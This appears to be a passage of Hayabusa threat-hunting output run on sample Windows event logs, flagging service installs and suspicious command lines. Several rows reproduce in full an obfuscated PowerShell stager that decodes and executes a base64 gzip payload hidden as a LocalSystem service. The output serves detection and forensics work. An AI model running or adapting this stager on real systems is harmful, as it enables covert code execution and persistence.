GXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd 